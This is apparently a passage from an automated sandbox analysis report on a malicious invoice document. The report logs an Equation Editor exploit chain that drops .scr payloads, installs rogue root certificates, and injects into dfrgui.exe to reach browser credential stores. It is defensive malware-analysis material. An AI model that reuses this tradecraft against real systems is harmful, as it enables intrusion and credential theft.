            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
            Source: dfrgui.exe, 00000008.00000002.629708438.0000000061E8A000.00000002.00000001.01000000.0000000A.sdmp, sqlite3.dll.8.drBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: Beauty_Stem_Invoice.docVirustotal: Detection: 40%
            Source: Beauty_Stem_Invoice.docReversingLabs: Detection: 44%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrProcess created: C:\Users\user\AppData\Roaming\op33779.scr "C:\Users\user\AppData\Roaming\op33779.scr"Jump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeProcess created: C:\Windows\SysWOW64\dfrgui.exe "C:\Windows\SysWOW64\dfrgui.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\op33779.scrSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: virtdisk.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: fltlib.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: sxshared.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: mozglue.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: cryptui.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched32.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: version.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\dfrgui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: Beauty_Stem_Invoice.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Beauty_Stem_Invoice.doc
            Source: C:\Windows\SysWOW64\dfrgui.exeFile opened: C:\Windows\SysWOW64\RichEd32.dllJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\op33779.scrFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: op33779.scr, 00000005.00000002.354405964.0000000001DD0000.00000004.08000000.00040000.00000000.sdmp, op33779.scr, 00000005.00000002.354434353.0000000002031000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: dfrgui.pdb source: gpgLFpElQuxhEi.exe, 00000007.00000003.388534971.0000000000870000.00000004.00000001.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000003.388698667.00000000009C0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gpgLFpElQuxhEi.exe, 00000007.00000002.628862520.0000000000B4E000.00000002.00000001.01000000.00000008.sdmp, gpgLFpElQuxhEi.exe, 0000000C.00000000.414395638.0000000000B4E000.00000002.00000001.01000000.00000008.sdmp
            Source: Binary string: dfrgui.pdb2D source: gpgLFpElQuxhEi.exe, 00000007.00000003.388534971.0000000000870000.00000004.00000001.00020000.00000000.sdmp, gpgLFpElQuxhEi.exe, 00000007.00000003.388698667.00000000009C0000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: op33779.scr, op33779.scr, 00000006.00000002.401638574.0000000000AC0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.401548955.0000000001E30000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000003.401907663.0000000001F90000.00000004.00000020.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.628890620.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, dfrgui.exe, 00000008.00000002.628890620.0000000002120000.00000040.00001000.00020000.00000000.sdmp
            Source: opszx[1].scr.2.drStatic PE information: 0xF45CD8BD [Mon Nov 30 12:38:21 2099 UTC]
            Source: sqlite3.dll.8.drStatic PE information: section name: /4
            Source: sqlite3.dll.8.drStatic PE information: section name: /19
            Source: sqlite3.dll.8.drStatic PE information: section name: /31
            Source: sqlite3.dll.8.drStatic PE information: section name: /45
            Source: sqlite3.dll.8.drStatic PE information: section name: /57
            Source: sqlite3.dll.8.drStatic PE information: section name: /70
            Source: sqlite3.dll.8.drStatic PE information: section name: /81
            Source: sqlite3.dll.8.drStatic PE information: section name: /92
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_00549170 push eax; retf 2_2_00549171
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0054A5C0 push eax; retn 0054h2_2_0054A5C1
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005401F4 push eax; retf 2_2_005401F5
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001DB855 pushad ; iretd 6_2_001DB884
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C7936 push eax; iretd 6_2_001C7937
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D91E7 push ecx; ret 6_2_001D91E8
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D5A7A push esi; retf 6_2_001D5AB4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001CEB41 push 7B0B5DBBh; iretd 6_2_001CEB4A
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001EF3B2 push eax; ret 6_2_001EF3B4
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D9C00 pushad ; retf 6_2_001D9C2D
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001D5C3E push esp; retf 6_2_001D5C8E
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001C3640 push eax; ret 6_2_001C3642
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_001DF75D push eax; iretd 6_2_001DF75E
            Source: C:\Users\user\AppData\Roaming\op33779.scrCode function: 6_2_00ADDFA1 push ecx; ret 6_2_00ADDFB4
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD9DAB pushad ; retf 7_2_05DD9DD8
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DEF55D push eax; ret 7_2_05DEF55F
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DE056A push eax; ret 7_2_05DE0592
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DCECEC push 7B0B5DBBh; iretd 7_2_05DCECF5
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DE0462 push esi; retf 7_2_05DE0463
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DDF908 push eax; iretd 7_2_05DDF909
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DE5878 push ds; iretd 7_2_05DE5883
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DD9392 push ecx; ret 7_2_05DD9393
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DE53AF push es; ret 7_2_05DE53C6
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DC7AE1 push eax; iretd 7_2_05DC7AE2
            Source: C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exeCode function: 7_2_05DDBA00 pushad ; iretd 7_2_05DDBA2F
            Source: opszx[1].scr.2.drStatic PE information: section name: .text entropy: 7.511694981602404
            Source: op33779.scr.2.drStatic PE information: section name: .text entropy: 7.511694981602404

            Persistence and Installation Behavior

            barindex
            Drops PE files with a suspicious file extension
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op33779.scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scrJump to dropped file
            Installs new ROOT certificates
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\op33779.scrJump to dropped file
            Source: C:\Windows\SysWOW64\dfrgui.exeFile created: C:\Users\user\AppData\Local\Temp\sqlite3.dllJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opszx[1].scrJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
